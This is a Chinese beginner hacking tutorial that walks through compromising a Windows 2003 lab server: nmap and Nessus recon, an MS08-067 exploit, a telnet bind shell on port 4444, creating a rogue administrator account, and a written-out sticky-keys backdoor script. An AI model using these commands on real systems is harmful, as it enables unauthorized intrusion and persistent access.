小白客帶你走進黑客世界5之一次完整的系統攻擊行為

工欲善其事，必先利其器。在上一篇文章小白為大家介紹了黑客攻擊過程中最用要的一環——踩點（信息收集）方面的兩款漏洞掃描工具的安裝過程和基本使用方式。今天，就讓小白帶領著大家進行一次完整的攻擊過程。

再次回到我們一開始的文章小白介紹了黑客攻擊行為的模型大致為：

踩點–>定位–>入侵–>留後門–>抹去痕跡

本次文章小白將要給大家來演示如何來攻破一臺winows 2003 服務器，攻擊的過程也將遵循上面的行為模型。

假設，在小白所在的局域網（ip：192.168.31.0/24）中，有一臺windows 2003 的服務器，小白想要到服務器上面逛上一圈，但是很尷尬的是小白不知道這臺服務器的ip地址，也並沒有這臺服務器的賬號

踩點

第一步：使用過nmap對局域網進行掃描，掃描局域網中存在的計算機和對應的操作系統。

Nmap命令：

nmap –sn 網段 ->使用ping掃描局域網中存貨的主機

nmap –O ip地址 ->識別單個ip地址的操作系統

通過掃描主機存活我們可以看到，局域網中存在著5個ip地址。

192.168.31.1
192.168.31.2
192.168.31.133
192.168.31.254
192.168.31.132

通過簡單的判斷，192.168.31.1、192.168.31.2、192.168.31.132這三個地址是小白的電腦和網關的地址啦 ，可以直接排除。就只剩下192.168.31.133、192.168.31.254這兩個地址了，接下來我們分別對這兩個ip地址進行系統的識別

通過對192.168.31.254的系統識別，它說這臺計算機可能採用了特殊的操作系統，它無法識別，也有可能這個ip地址它不是一臺計算機。接著，對192.168.31.133進行系統識別

果然，找到了服務器的ip地址，nmap的結果顯示192.168.31.133這臺計算機使用的正是windws 2003 操作系統。既然知道了ip地址，我們就可以進行漏洞掃描啦。

第二步：使用nessus對系統漏洞進行掃描

上一篇文章可能忘記說的一點就是nessus怎麼打開了，在這裡小白說一下。如果是在自己本地的計算機上面安裝了nessus的話，就在火狐或者谷歌瀏覽器中輸入地址：

https://localhost:8834

如果是在其他計算機上面安裝的話，就在地址欄中輸入：

https://ip地址:8834

那麼，現在，我們就使用nessus開始對192.168.31.133這臺服務器進行漏洞掃描。具體的使用方式可以查看小白的上一篇文章噢。

分析

通過上圖的掃描結果我們可以看出，該服務器存在漏洞編號為MS08-067的經典緩衝區溢出漏洞，我們可以通過該漏洞在服務器上面執行代碼。

萬能的度娘告訴我，這個漏洞是有直接的利用工具的，於是小白默默的收藏了一個。

入侵

第一步：下載ms08-067漏洞利用工具

第二步：打開cmd窗口，將漏洞利用程序用鼠標拖進窗口

第三步：輸入服務器的ip地址 192.168.31.133，回車進行攻擊。

這裡小白猜想，既然是溢出漏洞，肯定和內存地址有關。有可能是win7的內存地址和windows2003的不同。

小白找了一臺windows xp的計算機重新進行攻擊

第四步：通過遠程連接服務器（192.168.31.133）的4444端口，登陸服務器。

telnet 192.168.31.133 4444

當然了，只是登陸它的命令行界面怎麼能行呢？接下來，小白要做的就是利用命令創建一個管理員賬號，光明正大的利用賬號密碼登陸。

第五步：創建管理員賬號密碼，並登陸服務器

我們通過登陸服務器的命令行界面來創建管理員賬號密碼。

命令：

net user 用戶名 密碼 /add
net localgroup administrators 用戶名 /add

這樣，我們就創建了一個管理員賬號啦。我們嘗試通過遠程桌面的方式登陸。

在本地計算機的運行窗口輸入：mstsc，打開遠程桌面連接窗口，輸入服務器的地址

留後門

既然已經入侵到服務了，怎麼能不留給自己留下一個後門呢，方便下次進入。如果說我們這次創建的賬號被管理員刪掉了怎麼辦。接下來，小白就在服務器上面留下一個簡單的shift後門。

第一步：編寫shift後門腳本

點擊開始-運行，輸入命令：notepad，並回車會彈出來一個記事本。

在記事本里面寫上以下代碼：

echo 提權開始......
copy c:\windows\system32\cmd.exe c:\windows\system32\dllcache\sethc.exe
copy c:\windows\system32\dllcache\sethc.exe c:\windows\system32\sethc.exe
echo 提權結束......

保存，文件類型選擇所有文件，文件名稱為shift.bat

第二步：雙擊剛保存的bat腳本，創建shift後門，運行完成時候，嘗試在服務器上面連續按五次shift鍵

發現服務器彈出了一個命令行界面，這個界面還是可移植性系統權限的。接下來，我們把遠程桌面關掉，再重新連接，然後不要輸入賬號密碼，再一次連按五次shift鍵

接著，嘗試在這個未登錄的命令行界面下創建另一個管理員賬號。

我們使用dahuadan這個賬號登陸，發現登陸成功

這樣即使管理員刪除了我們偷偷創建的賬號，也不怕不怕啦~ 就再創建一個唄~

抹去痕跡

暫不涉及（有需要的同學自行研究）

最重要的一點，不要搞壞事噢！